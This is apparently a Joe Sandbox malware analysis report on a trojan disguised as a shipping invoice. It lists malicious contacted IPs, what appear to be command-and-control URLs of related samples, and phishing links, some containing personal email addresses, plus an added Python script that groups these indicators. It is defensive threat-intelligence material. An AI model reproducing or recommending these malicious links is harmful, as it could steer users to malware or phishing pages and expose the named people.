The URLs below were found as strings in the listed Source (an explorer.exe memory dump, .sdmp, or a dropped file, .dr, or the sample itself), not observed in network traffic; none is flagged malicious and the font-vendor entries are ordinary font metadata.

URL | Source | Malicious | Antivirus detection | Reputation
http://www.galapagosdesign.com/staff/dennis.htm | explorer.exe, 00000004.00000000.710942524.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe (3x) | unknown
http://fontfabrik.com | explorer.exe, 00000004.00000000.710942524.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe (3x) | unknown
http://www.founder.com.cn/cn | explorer.exe, 00000004.00000000.710942524.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe (3x) | unknown
http://www.fontbureau.com/designers/frere-user.html | explorer.exe, 00000004.00000000.710942524.000000000B976000.00000002.00000001.sdmp | false | (none) | high
http://nsis.sf.net/NSIS_Error | Shipping INVOICE-BL Shipment..exe | false | (none) | high
http://www.freedesktop.org/standards/shared-mime-info | nse53A7.tmp.0.dr | false | (none) | high
http://www.businessobjects.com0 | nse53A7.tmp.0.dr | false | Avira URL Cloud: safe | unknown
http://www.jiyu-kobo.co.jp/ | explorer.exe, 00000004.00000000.710942524.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe (3x) | unknown
http://www.galapagosdesign.com/DPlease | explorer.exe, 00000004.00000000.710942524.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe (3x) | unknown
http://www.fontbureau.com/designers8 | explorer.exe, 00000004.00000000.710942524.000000000B976000.00000002.00000001.sdmp | false | (none) | high
http://www.%s.comPA | explorer.exe, 00000004.00000000.693351563.0000000002B50000.00000002.00000001.sdmp | false | URL Reputation: safe (3x) | low
http://www.fonts.com | explorer.exe, 00000004.00000000.710942524.000000000B976000.00000002.00000001.sdmp | false | (none) | high
http://www.sandoll.co.kr | explorer.exe, 00000004.00000000.710942524.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe (3x) | unknown
http://www.urwpp.deDPlease | explorer.exe, 00000004.00000000.710942524.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe (3x) | unknown
http://www.zhongyicts.com.cn | explorer.exe, 00000004.00000000.710942524.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe (3x) | unknown
http://www.sakkal.com | explorer.exe, 00000004.00000000.710942524.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe (3x) | unknown

                                                                            Contacted IPs


                                                                            Public

IP | Domain | Country | ASN | ASN Name | Malicious
192.0.78.24 | unknown | United States | 2635 | AUTOMATTICUS | true
95.215.210.10 | unknown | Russian Federation | 49055 | NEWIT-ASRU | true
165.227.229.15 | unknown | United States | 14061 | DIGITALOCEAN-ASNUS | true
34.102.136.180 | unknown | United States | 15169 | GOOGLEUS | true
23.88.85.105 | unknown | United States | 18978 | ENZUINC-US | true
75.126.100.11 | unknown | United States | 36351 | SOFTLAYERUS | true

                                                                            General Information

Joe Sandbox Version: 31.0.0 Red Diamond
Analysis ID: 323227
Start date: 26.11.2020
Start time: 15:06:20
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 9m 2s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: Shipping INVOICE-BL Shipment..exe
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 15
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.evad.winEXE@9/27@11/6
EGA Information: Failed
HDC Information:
• Successful, ratio: 69.3% (good quality ratio 63.9%)
• Quality average: 72.3%
• Quality standard deviation: 31.2%
HCA Information:
• Successful, ratio: 82%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .exe
Warnings:
                                                                            • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
                                                                            • Excluded IPs from analysis (whitelisted): 104.42.151.234, 52.255.188.83, 104.43.193.48, 51.104.139.180, 20.54.26.129, 52.155.217.156, 8.241.121.254, 8.248.117.254, 67.26.83.254, 67.26.73.254, 67.26.81.254
                                                                            • Excluded domains from analysis (whitelisted): displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, arc.msn.com.nsatc.net, db3p-ris-pf-prod-atm.trafficmanager.net, ris-prod.trafficmanager.net, displaycatalog.md.mp.microsoft.com.akadns.net, ctldl.windowsupdate.com, arc.msn.com, skypedataprdcolcus15.cloudapp.net, ris.api.iris.microsoft.com, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, skypedataprdcoleus17.cloudapp.net, blobcollector.events.data.trafficmanager.net, audownload.windowsupdate.nsatc.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, auto.au.download.windowsupdate.com.c.footprint.net, skypedataprdcolwus16.cloudapp.net, au-bg-shim.trafficmanager.net
                                                                            • Report size getting too big, too many NtReadVirtualMemory calls found.

                                                                            Simulations

                                                                            Behavior and APIs

Time | Type | Description
15:07:26 | API Interceptor | 20x Sleep call for process: cmd.exe modified

                                                                            Joe Sandbox View / Context

                                                                            IPs

Match | Associated sample name / URL | Detection | Context
192.0.78.24 | dB7XQuemMc.exe | malicious | www.lostintraveland.com/nt8e/?wfv=VbtcqB+EWbxdZOX/9YxeVA6owrwkM55mfLmzDpPytykHKv5w+HQ2tOlnH/hPksabIPhH&Tj=yrIt
192.0.78.24 | jtFF5EQoEE.exe | malicious | www.pamforprogress.com/bg8v/?YvuLylfp=DPerEW6C5mmZA0l94jTYzByN7CgGbRpDXVp6aOkaUr5qiBkcUA6mjjfpS5thmS0etuhe0Le2iw==&EZ6tXv=jfFD8XLPm
192.0.78.24 | 4lsCTb3dCs.xlsx | malicious | www.albamauto.net/mlr/?TB=M2ONgKWxO+pxZDmGkRYnBgr0Qvxkx07TSjUdIXRuuPJ75jwEP4sVnZ6k4+tDxb4GtZG3Dw==&-Z=KX7t
192.0.78.24 | ORDER LIST.exe | malicious | www.fieldstoneweb.com/d8h/?uVj0=M694u&elX=G2AD4xCmb4k5smncvxEgkOrSnmQsxzVS0kRbAQojBm5YrhxKsIkYx8nrOX7npgeB9Q6J
192.0.78.24 | Additional Agreement 2020-KYC.exe | malicious | www.caffeinatedmamasblog.com/bw82/?K4k0=ppkw3jVLAhg0fBK+Rqz7w5wuFkCqrmyhYj1xCoWLem4jpCaa6eG2jsuqoj7iAnfAkBOg&dDH=P0GPezWpdVGtah
192.0.78.24 | DEWA PROJECT 12100317.exe | malicious | www.caffeinatedmamasblog.com/bw82/?Sh=ppkw3jVLAhg0fBK+Rqz7w5wuFkCqrmyhYj1xCoWLem4jpCaa6eG2jsuqoj7iAnfAkBOg&RZB=dnrxRrdHFPe8sx
192.0.78.24 | camscanner-011022020.exe | malicious | www.lostintraveland.com/nt8e/?AjR=6lNDud_px60PYpMP&GdC0=VbtcqB+EWbxdZOX/9YxeVA6owrwkM55mfLmzDpPytykHKv5w+HQ2tOlnH/t2oN2bfJ9W1t42Dw==
192.0.78.24 | yeni sipari#U015f.exe | malicious | www.candidlyadulting.com/fs8/?Jtx=hpmTov6x9FExUxk&DxlpiZ=D3R6JGO1r/B7aryTXvdtZUIZz7VR99K4SJ+m/jhm2M7Qu8tRU5/30gbZTGzF02WjXx2GFv5WGw==
192.0.78.24 | N8dZeg2Gwv.exe | malicious | www.silablume.life/nsz0/?EZA4Dv=sJMqT74yzKPc0CXZ1bVZ9vmXm9D5l+yr1mEW4OMm1AmvM4uivsaDi0GnhxfyNMGqcICX&DzrLW=VBZtT8H860ZDMf
192.0.78.24 | Ordem de Compra.exe | malicious | www.candidlyadulting.com/fs8/?ohrXP=8pVlQDW0DHcdZ&aFQLkfLx=D3R6JGO1r/B7aryTXvdtZUIZz7VR99K4SJ+m/jhm2M7Qu8tRU5/30gbZTFfVoHKYQEfX
192.0.78.24 | Remittance Scan DOC-2029293#PI207-048.pptx.exe | malicious | www.verhoovensjazz.com/svh9/?pvbxDRU0=hIXnITRX5g9qlr7UKMVcUmQgGYVza+1LZ4MbDhBPrfD3KmnI5h1sBMIzq9NdJDKiEkau&GF=6lAXWxuPj6ip-nG
192.0.78.24 | PO8479349743085.exe | malicious | www.ilginozgul.academy/d8h/?njq0sr=RzuPip&Jfy=hxziWhDbe9FtO5QC+Iayu5oAw7zUzdpri4d+sOU1Z76r/3C/gB///JFONya9oZ2maPzF
192.0.78.24 | New Purchase Order 501,689$.exe | malicious | www.wisdom-consult.com/eao/?4h0=T0Tn5CMpJlw7KTFi8mklq+ufWO0+gN0tiRN8n0KpOAruCx/Skg63+XHqwTAdYe+Ba4Dk&wR=OtxhY2
192.0.78.24 | Lab06-04.exe | malicious | www.practicalmalwareanalysis.com/cc.htm
192.0.78.24 | New Purchase Order 50,689$.exe | malicious | www.wisdom-consult.com/eao/?sN=XxlTxbk0bRLtdLp&7nt4il2=T0Tn5CMpJlw7KTFi8mklq+ufWO0+gN0tiRN8n0KpOAruCx/Skg63+XHqwTAdYe+Ba4Dk
192.0.78.24 | sample.exe | malicious | www.broadcastsfromthebrainradio.com/kbr/?IDKDM4yx=sxsN1nJkucau2pxuJEzF+Ou0Y2fZMywFtQwHpaGWE6wL4+YSQccjq2y4HrbzwsseprRV&CXO03=fTjPtjUxadQPaH
192.0.78.24 | 5PTXM4x7ySyoOy6.exe | malicious | www.briankarenontour.com/cdm/?9r7Lx=FdC4&tZUP=BsKydJtdCX/LmGJNw6IjwIptjSMnAePZ9lQvPe5DRIF9jZdfgTCYKvcvUdDrbb5JxrKt
192.0.78.24 | Vessel details.exe | malicious | www.electrictractorinc.com/aut/?Qxo=6AkeHu94VUL9K29KVGiRaXTp4SaEFDH9eRBS58btbVSf3gxFjHFad8uHTII5qActZvYLk1ugVw==&MJBD=FdCp3xCPZ4mLG8jP
192.0.78.24 | Lab07-02.exe | malicious | www.practicalmalwareanalysis.com/ad.html
192.0.78.24 | Lab13-01.exe | malicious | www.practicalmalwareanalysis.com/MDYxNTQ0/
34.102.136.180 | PO98765.exe | malicious | www.westhighlandwaytours.com/sbmh/?4hLtM4=7c1Yf2hXTdqRFKk5H17xFHcZtn6ZaViryhouZ8x83IEcsjPhhroi25cpiHSX6hk8gWCa&n0DXRn=xPJxZNG0xPz
34.102.136.180 | Booking Confirmation.xlsx | malicious | www.setyourhead.com/kgw/?YPxdA=qxnbG0TgnGHGw+QslghqCPaDw7mfFbPu6Z/l2x9tLypy5Il4TL/Oe56TI1g3tXVevJbT7w==&FN=-ZD4lhJxcp08lll
34.102.136.180 | PI202009255687.xlsx | malicious | www.lygosfilms.info/ogg/?Xrx4lx8=o9DTWGgejQhFb0XDNKFr8x252gLWlqtFw+u/IiN1z9p9QWzZEqjsrtg5rynyb3VCEFeW0g==&eny8V=8p-t_j0xRnOLT2
34.102.136.180 | VOMAXTRADING.doc | malicious | www.mycapecrusade.com/bu43/?OBZPd=k6AhchXHBB&Yzrx=5Lfh6qcZO6QCpL41ah3mk8LUL3OJ/OZx9c26bzra2u0GgF5XtbJN8WKHQCrI7u2LEBkhnA==
34.102.136.180 | purchase order.exe | malicious | www.rettexo.com/sbmh/?0PJtBJ=kHp9H1tPAFmVsD64lxBGFA2zeARzx9tS7bJBiT/v97zwTY8F+uE1Nk95aq19aJdA0x4qnOoYAg==&jDHXG=aFNTklSp
34.102.136.180 | inv.exe | malicious | www.nextgenmemorabilia.com/hko6/?rL0=EcalOYSyHuIWNe0yBiyzQnDoyWnQ8AXmuso6y7H91Y9cmoRSZtclvU9o5GCKwGOmvOmDBOYeyw==&3f_X=Q2J8lT4hKB4
34.102.136.180 | anthon.exe | malicious | www.stlmache.com/94sb/?D8c=zlihirZ0hdZXaD&8pdPSNhX=oHhCnRhAqLFON9zTJDssyW7Qcc6qw5o0Z4654po5P9rAmpqiU8ijSaSHb7UixrcmwTy4
34.102.136.180 | RFQ For TRANS ANATOLIAN NATURAL GAS PIPELINE (TANAP) - PHASE 1(Package 2).exe | malicious | www.messianicentertainment.com/mkv/
34.102.136.180 | Scan 25112020 pdf.exe | malicious | www.youarecoveredamerica.com/cxs/?wR=30eviFukjpDMKdZAPLSN5kaysTzlcADcsOyOixR0/60FoTO0nFa3+4ZYvhmf8uIzSvTf&V4=inHXwbhx
34.102.136.180 | PO EME39134.xlsx | malicious | www.pethgroup.com/mfg6/?NL08b=wzYKSVBwuJMkKFzZssaTzgW2Vk9zJFgyObnh9ous05GVmO8iDcl865kQdMMIGiQlXQz3Bg==&Ab=JpApTx
34.102.136.180 | PRODUCT INQUIRY BNQ1.xlsx | malicious | www.d2cbox.com/coz3/?RFN4=Db4oM/0ZSLcS2WrsSk0EAPitYAH7G5kPXSBsu1Ti9XYpj/EUmwYzXG6I+6XEGkDvXHlCmg==&RB=NL00JzKhBv9HkNRp
34.102.136.180 | Document Required.xlsx | malicious | www.vegbydesign.net/et2d/?LDHDp=V0L4Gg8XEG33noZ7KcimyECCbO7JKaiXnbIiZHmOm/4B4fbkqB2G6gSUl7eOq1VGLYG7cQ==&1bY8l=ktg8tf6PjX7
34.102.136.180 | Payment - Swift Copy.exe | malicious | www.meetyourwish.com/mnc/?Mdkdxdax=WY4KUSY8ftRWBzX7AqE30jxuDiwNulyYTSspkj6O426HLT41/FrvTZzWmkvAdUuy3I6l&ZVj0=YN6tXn0HZ8X
34.102.136.180 | Shipment Document BLINV And Packing List Attached.exe | malicious | www.kanmra.com/bg8v/?DXIXO=bN+sZwdqksHEVUXNrgv1qWKxxuRS+qOVBUFqNGSJvK31ERFsrbT8+Ywa/qntJ641tecm&Jt7=XPv4nH2h
34.102.136.180 | SR7UzD8vSg.exe | malicious | www.seatoskyphotos.com/g65/?7nwhJ4l=TXJeSLolb01vansOrhIgOMhNYUnQdj/rfF4amJcBrUYE+yYYkSMe6xNPoYCNXAECPfCM&PpJ=2dGHUZtH1RcT9x
34.102.136.180 | fSBya4AvVj.exe | malicious | www.crdtchef.com/coz3/?uVg8S=yVCTVPM0BpPlbRn&Cb=6KJmJcklo30WnY6vewxcXLig2KFmxMKN3/pat9BWRdDInxGr1qf1MmoT0+9/86rmVbJja+uPDg==
34.102.136.180 | 7OKYiP6gHy.exe | malicious | www.space-ghost.com/mz59/?DxlpdH=bx7WlvEZr3O5XBwInsT/p4C3h10gePk/QJkiFTbVYZMx/qNyufU701Fr8sAaS9DQf7SJ&k2Jxtb=fDHHbT_hY
34.102.136.180 | ptFIhqUe89.exe | malicious | www.pethgroup.com/mfg6/?EZxHcv=idCXUjVPw&X2MdRr9H=wzYKSVB1uOMgKV/VusaTzgW2Vk9zJFgyOb/xhrytwZGUm/QkEM0ws9cSepgeCyUWcTuH
34.102.136.180 | G1K3UzwJBx.exe | malicious | www.softdevteams.com/wsu/?JfBpEB4H=UDFlvLrb363Z/K3+q9OjWueixmKoOm8xQw3Yd3ofqrJMoI6bXqsuqW1H0uReyIz+CvJE&odqddr=RzuhPD
34.102.136.180 | ARRIVAL NOTICE.xlsx | malicious | www.befitptstudio.com/ogg/?oN9xX=4mwbOnk+WEse1PEPUI+9OE7CuRKrYpR8Uy9t/eBM2SPWQ9N1Pm1uQBQ852Ah+FLlD8dO/Q==&r8=-ZoxsbmheH5H_0_
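The context rows above (and the ASN rows that follow) are only useful if the shared infrastructure is pulled out of them: several hosts appear under more than one earlier sample, and the stable part of each URL is the host plus its short path, while the query string differs per sample. The following Python does that grouping. It is an added example, not code from the Joe Sandbox report; the input list is a constructed subset of the (sample, context URL) pairs copied verbatim from the table above, and the function and constant names are the example's own.

```python
from collections import defaultdict
from urllib.parse import parse_qsl, urlsplit

# Constructed input: a subset of the (sample name, context URL) rows copied
# verbatim from the "Joe Sandbox View / Context" IP table for 192.0.78.24
# and 34.102.136.180. The full table has 40 rows; 14 are enough to show
# the pivots.
CONTEXT_URLS = [
    ("dB7XQuemMc.exe", "www.lostintraveland.com/nt8e/?wfv=VbtcqB+EWbxdZOX/9YxeVA6owrwkM55mfLmzDpPytykHKv5w+HQ2tOlnH/hPksabIPhH&Tj=yrIt"),
    ("jtFF5EQoEE.exe", "www.pamforprogress.com/bg8v/?YvuLylfp=DPerEW6C5mmZA0l94jTYzByN7CgGbRpDXVp6aOkaUr5qiBkcUA6mjjfpS5thmS0etuhe0Le2iw==&EZ6tXv=jfFD8XLPm"),
    ("4lsCTb3dCs.xlsx", "www.albamauto.net/mlr/?TB=M2ONgKWxO+pxZDmGkRYnBgr0Qvxkx07TSjUdIXRuuPJ75jwEP4sVnZ6k4+tDxb4GtZG3Dw==&-Z=KX7t"),
    ("Additional Agreement 2020-KYC.exe", "www.caffeinatedmamasblog.com/bw82/?K4k0=ppkw3jVLAhg0fBK+Rqz7w5wuFkCqrmyhYj1xCoWLem4jpCaa6eG2jsuqoj7iAnfAkBOg&dDH=P0GPezWpdVGtah"),
    ("DEWA PROJECT 12100317.exe", "www.caffeinatedmamasblog.com/bw82/?Sh=ppkw3jVLAhg0fBK+Rqz7w5wuFkCqrmyhYj1xCoWLem4jpCaa6eG2jsuqoj7iAnfAkBOg&RZB=dnrxRrdHFPe8sx"),
    ("camscanner-011022020.exe", "www.lostintraveland.com/nt8e/?AjR=6lNDud_px60PYpMP&GdC0=VbtcqB+EWbxdZOX/9YxeVA6owrwkM55mfLmzDpPytykHKv5w+HQ2tOlnH/t2oN2bfJ9W1t42Dw=="),
    ("yeni sipari#U015f.exe", "www.candidlyadulting.com/fs8/?Jtx=hpmTov6x9FExUxk&DxlpiZ=D3R6JGO1r/B7aryTXvdtZUIZz7VR99K4SJ+m/jhm2M7Qu8tRU5/30gbZTGzF02WjXx2GFv5WGw=="),
    ("Ordem de Compra.exe", "www.candidlyadulting.com/fs8/?ohrXP=8pVlQDW0DHcdZ&aFQLkfLx=D3R6JGO1r/B7aryTXvdtZUIZz7VR99K4SJ+m/jhm2M7Qu8tRU5/30gbZTFfVoHKYQEfX"),
    ("Lab06-04.exe", "www.practicalmalwareanalysis.com/cc.htm"),
    ("New Purchase Order 501,689$.exe", "www.wisdom-consult.com/eao/?4h0=T0Tn5CMpJlw7KTFi8mklq+ufWO0+gN0tiRN8n0KpOAruCx/Skg63+XHqwTAdYe+Ba4Dk&wR=OtxhY2"),
    ("New Purchase Order 50,689$.exe", "www.wisdom-consult.com/eao/?sN=XxlTxbk0bRLtdLp&7nt4il2=T0Tn5CMpJlw7KTFi8mklq+ufWO0+gN0tiRN8n0KpOAruCx/Skg63+XHqwTAdYe+Ba4Dk"),
    ("RFQ For TRANS ANATOLIAN NATURAL GAS PIPELINE (TANAP) - PHASE 1(Package 2).exe", "www.messianicentertainment.com/mkv/"),
    ("PO EME39134.xlsx", "www.pethgroup.com/mfg6/?NL08b=wzYKSVBwuJMkKFzZssaTzgW2Vk9zJFgyObnh9ous05GVmO8iDcl865kQdMMIGiQlXQz3Bg==&Ab=JpApTx"),
    ("ptFIhqUe89.exe", "www.pethgroup.com/mfg6/?EZxHcv=idCXUjVPw&X2MdRr9H=wzYKSVB1uOMgKV/VusaTzgW2Vk9zJFgyOb/xhrytwZGUm/QkEM0ws9cSepgeCyUWcTuH"),
]


def parse_context_url(url):
    """Split a context URL into host, path, first path token and query keys.

    The report lists URLs without a scheme; urlsplit() would treat such a
    string as a bare path, so a scheme is prepended when one is missing.
    """
    if "://" not in url:
        url = "http://" + url
    parts = urlsplit(url)
    stripped = parts.path.strip("/")
    token = stripped.split("/")[0] if stripped else ""
    keys = [k for k, _ in parse_qsl(parts.query, keep_blank_values=True)]
    return {
        "host": parts.hostname,
        "path": parts.path,
        "token": token,
        "query_keys": keys,
        "n_params": len(keys),
    }


def samples_by_host(entries):
    """Map each host to the sorted list of sample names that used it."""
    hosts = defaultdict(set)
    for sample, url in entries:
        hosts[parse_context_url(url)["host"]].add(sample)
    return {host: sorted(samples) for host, samples in hosts.items()}


def shared_hosts(entries):
    """Hosts seen from more than one sample: the pivot points for hunting."""
    return {h: s for h, s in samples_by_host(entries).items() if len(s) > 1}


def indicators(entries):
    """Distinct (host, path) pairs. The query string changes per sample,
    so host and path are the part worth keeping as an indicator."""
    pairs = set()
    for _, url in entries:
        parsed = parse_context_url(url)
        pairs.add((parsed["host"], parsed["path"]))
    return sorted(pairs)


def param_count_outliers(entries, expected=2):
    """Rows whose query does not carry the usual number of parameters."""
    return [(s, u) for s, u in entries
            if parse_context_url(u)["n_params"] != expected]


if __name__ == "__main__":
    for host, samples in sorted(shared_hosts(CONTEXT_URLS).items()):
        print(f"shared: {host}: {', '.join(samples)}")
    for host, path in indicators(CONTEXT_URLS):
        print(f"indicator: {host}{path}")
    for sample, url in param_count_outliers(CONTEXT_URLS):
        n = parse_context_url(url)["n_params"]
        print(f"outlier ({n} params): {sample} -> {url}")
```

Most rows in the report carry exactly two query parameters; the parameter count is reported so the exceptions (the practicalmalwareanalysis.com lab pages and www.messianicentertainment.com/mkv/) stand out rather than being silently folded in. The same grouping applies to the ASN context table below by swapping the URL column for the IP in each row.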

                                                                            Domains

                                                                            No context

                                                                            ASN

Match | Associated sample name / URL | Detection | Context
AUTOMATTICUS | https://showmewhatyouhave.com/wp-includes/ID3/ASB/?email=kmcpherson@deloitte.co.nz | malicious | 192.0.77.48
AUTOMATTICUS | PRODUCT INQUIRY BNQ1.xlsx | malicious | 74.114.154.18
AUTOMATTICUS | Shipment Document BLINV And Packing List Attached.exe | malicious | 192.0.78.25
AUTOMATTICUS | https://www.im-creator.com/viewer/vbid-2070bf26-abbmfckb | malicious | 192.0.73.2
AUTOMATTICUS | https://ilovesanmarzanodop.com/wp-content/uploads/2020/supp/adfs/index.html | malicious | 192.0.77.48
AUTOMATTICUS | http://binhnhi.com/index.html | malicious | 192.0.77.2
AUTOMATTICUS | Final-Payment-Receipt.exe | malicious | 192.0.78.230
AUTOMATTICUS | https://app.clio.com/link/AxWtfjmmzhja | malicious | 192.0.77.37
AUTOMATTICUS | KYC_DOC_.EXE | malicious | 192.0.78.25
AUTOMATTICUS | https://duemiglia.com | malicious | 192.0.77.48
AUTOMATTICUS | http://homeschoolingteen.com | malicious | 192.0.73.2
AUTOMATTICUS | https://facialxpressions.com/mox/ | malicious | 192.0.77.48
AUTOMATTICUS | https://www.women.com/alexa/quiz-dialect-test | malicious | 192.0.77.40
AUTOMATTICUS | dB7XQuemMc.exe | malicious | 192.0.78.24
AUTOMATTICUS | Amazon-Service-Center[2368].docx | malicious | 74.114.154.17
AUTOMATTICUS | Amazon-Service-Center[2368].docx | malicious | 74.114.154.17
AUTOMATTICUS | http://www.bananalife.com.au/ | malicious | 192.0.77.48
AUTOMATTICUS | https://10009907.createsend1.com/t/t-l-xdrsjk-l-r/#bWFyay5ibHVtQGNvZ25pYW4uY29t | malicious | 192.0.73.2
AUTOMATTICUS | https://10009907.createsend1.com/t/t-l-xdrsjk-l-r/#bWFyay5ibHVtQGNvZ25pYW4uY29t | malicious | 192.0.73.2
AUTOMATTICUS | jtFF5EQoEE.exe | malicious | 192.0.78.24
GOOGLEUS | 2zv940v7.dll | malicious | 216.58.215.225
GOOGLEUS | zojNE48815.apk | malicious | 8.8.4.4
GOOGLEUS | ANGEBOTXANFORDERNXXXXXXXXX26-11-2020.ppt | malicious | 172.217.168.1
GOOGLEUS | http://nity.midlidl.com/index | malicious | 216.58.206.1
GOOGLEUS | https://agjwxdkpqlmqklurjaovxhcdfc-dot-gloff00403993445.uk.r.appspot.com/#kynan.doha@fordway.com&data=04|01|kynan.doha@fordway.com|e82b1ab95d564094873f08d891edc7dc|92f571261c684e5180855cb2e14cc381|1|0|637419797746769194|Unknown|TWFpbGZsb3d8eyJWIjoiMC4wLjAwMDAiLCJQIjoiV2luMzIiLCJBTiI6Ik1haWwiLCJXVCI6Mn0=|1000&sdata=ZTxemzXa/xUx+Bg3lTShaT+EzejxRYLSPxP6RLnzsM0=&reserved=0 | malicious | 172.217.168.84
GOOGLEUS | https://email.utest.com/ls/click?upn=kHi9kJ2VFJGMl00Uc0lXdd7WKRMGsOIU4g4ei1d-2FX5m1QA-2FrT8Vl5L3Fk3cMytK6G9se1iMMnmCZDn1xIdrYiQ1p-2FwcQpvha0Cl5oPF0v81y5hgAsim7OqaA63T8LZn1UUJIEgydRUHiWwDj8GYDCxqGnV0O0rI4O7I6kSKWwA2QN6GRUB5jtLYkPnKAtjOoUgEhfuSimn9pHS78TURJ3gh4c37fJ5SLcFsdSMlL5cSNM599TAmyU83RYL5vT6LiS59Z_K8t8bbLaByOBk98eoL7OiHjGcOStuW9cK4Z47GjL3LOg6J63-2FMkWRpNoPmcLIu18HCMEgODcyx-2FUvVhPVIvmHjzJiqJBCjoeBbWoJaKrxsvgnkh140XYi8oSb4fB3DPwhOq9ho1ZQ40V7Ij7E76nndroD8i7Zx6K9k23tLqOPU-2BI4uv4B0Gy5ZNEnpZd7wg2RXwXNiQ76annNuw-2BlzoA5-2FGihgJE5sZwqDaPnA1XR7c-3D | malicious | 172.217.168.52
GOOGLEUS | http://pma.climabitus.com/undercook.php | malicious | 216.58.215.225
                                                                            https://brechi5.wixsite.com/owa-webmail-updatesGet hashmaliciousBrowse
                                                                            • 216.58.212.162
                                                                            PO98765.exeGet hashmaliciousBrowse
                                                                            • 34.102.136.180
                                                                            Booking Confirmation.xlsxGet hashmaliciousBrowse
                                                                            • 34.102.136.180
                                                                            PI202009255687.xlsxGet hashmaliciousBrowse
                                                                            • 34.102.136.180
                                                                            VOMAXTRADING.docGet hashmaliciousBrowse
                                                                            • 34.102.136.180
                                                                            ACCOUNT TEAM.pptGet hashmaliciousBrowse
                                                                            • 172.217.168.1
                                                                            purchase order.exeGet hashmaliciousBrowse
                                                                            • 34.102.136.180
                                                                            inv.exeGet hashmaliciousBrowse
                                                                            • 34.102.136.180
                                                                            http://email.balluun.com/ls/click?upn=0tHwWGqJA7fIfwq261XQPoa-2Bm5KwDIa4k7cEZI4W-2FdMZ1Q80M51jA5s51EdYNFwUO080OaXBwsUkIwQ6bL8cCo1cNcDJzlw2uVCKEfhUzZ7Fudhp6bkdbJB13EqLH9-2B4kEnaIsd7WRusADisZIU-2FqT0gWvSPQ-2BUMBeGniMV23Qog3fOaT300-2Fv2T0mA5uuaLf6MwKyAEEDv4vRU3MHAWtQ-3D-3DaUdf_BEBGVEU6IBswk46BP-2FJGpTLX-2FIf4Ner2WBFJyc5PmXI5kSwVWq-2FIninIJmDnNhUsSuO8YJPXc32diFLFly8-2FlazGQr8nbzBIO-2BSvdfUqJySNySwNZh5-2F7tiFSU4CooXZWp-2FjpdCX-2Fz89pGPVGN3nhMItFmIBBYMcjwlGWZ8vS3fpyiPHr-2BxekPNfR4Lq-2Baznil07vpcMoEZofdPQTnqnmg-3D-3DGet hashmaliciousBrowse
                                                                            • 172.217.168.84
                                                                            2020112395387_pdf.exeGet hashmaliciousBrowse
                                                                            • 35.246.6.109
                                                                            anthon.exeGet hashmaliciousBrowse
                                                                            • 34.102.136.180
                                                                            http://searchlf.comGet hashmaliciousBrowse
                                                                            • 74.125.128.154
                                                                            RFQ For TRANS ANATOLIAN NATURAL GAS PIPELINE (TANAP) - PHASE 1(Package 2).exeGet hashmaliciousBrowse
                                                                            • 34.102.136.180
                                                                            DIGITALOCEAN-ASNUSCompensationClaim-261722907-11242020.xlsGet hashmaliciousBrowse
                                                                            • 157.245.97.213
                                                                            CompensationClaim-261722907-11242020.xlsGet hashmaliciousBrowse
                                                                            • 157.245.97.213
                                                                            http://searchlf.comGet hashmaliciousBrowse
                                                                            • 82.196.7.246
                                                                            Izezma64.dllGet hashmaliciousBrowse
                                                                            • 68.183.89.248
                                                                            fuxenm32.dllGet hashmaliciousBrowse
                                                                            • 68.183.89.248
                                                                            ebuQ5cmR6y.docGet hashmaliciousBrowse
                                                                            • 138.197.207.88
                                                                            https://doc.clickup.com/p/h/84zph-7/c3996c24fc61b45Get hashmaliciousBrowse
                                                                            • 161.35.15.77
                                                                            22.exeGet hashmaliciousBrowse
                                                                            • 134.122.48.156
                                                                            CompensationClaim-310074970-11242020.xlsGet hashmaliciousBrowse
                                                                            • 157.245.97.213
                                                                            CompensationClaim-310074970-11242020.xlsGet hashmaliciousBrowse
                                                                            • 157.245.97.213
                                                                            https://cts.indeed.com/v0?tk=1df9t5skc2g3980p&r=%68%74%74%70%73%3a%2f%2f%61%6e%61%6c%79%74%69%63%73%2e%74%77%69%74%74%65%72%2e%63%6f%6d%2f%64%61%61%2f%30%2f%64%61%61%5f%6f%70%74%6f%75%74%5f%61%63%74%69%6f%6e%73%3f%61%63%74%69%6f%6e%5f%69%64%3d%33%26%70%61%72%74%69%63%69%70%61%6e%74%5f%69%64%3d%37%31%36%26%72%64%3d%68%74%74%70%73%3a%2f%2f%66%72%61%31%2e%64%69%67%69%74%61%6c%6f%63%65%61%6e%73%70%61%63%65%73%2e%63%6f%6d%2f%73%32%32%2f%69%6e%64%65%78%2e%68%74%6d%6c%3f#matthias.kirsch@iti.orgGet hashmaliciousBrowse
                                                                            • 5.101.109.44
                                                                            C03N224Hbu.exeGet hashmaliciousBrowse
                                                                            • 206.189.230.189
                                                                            Izipubob.dllGet hashmaliciousBrowse
                                                                            • 68.183.54.143
                                                                            http://ttixwac.sed.ocscreenwriter.comGet hashmaliciousBrowse
                                                                            • 138.197.59.238
                                                                            nivude1.dllGet hashmaliciousBrowse
                                                                            • 68.183.54.143
                                                                            Accesshover.dllGet hashmaliciousBrowse
                                                                            • 68.183.54.143
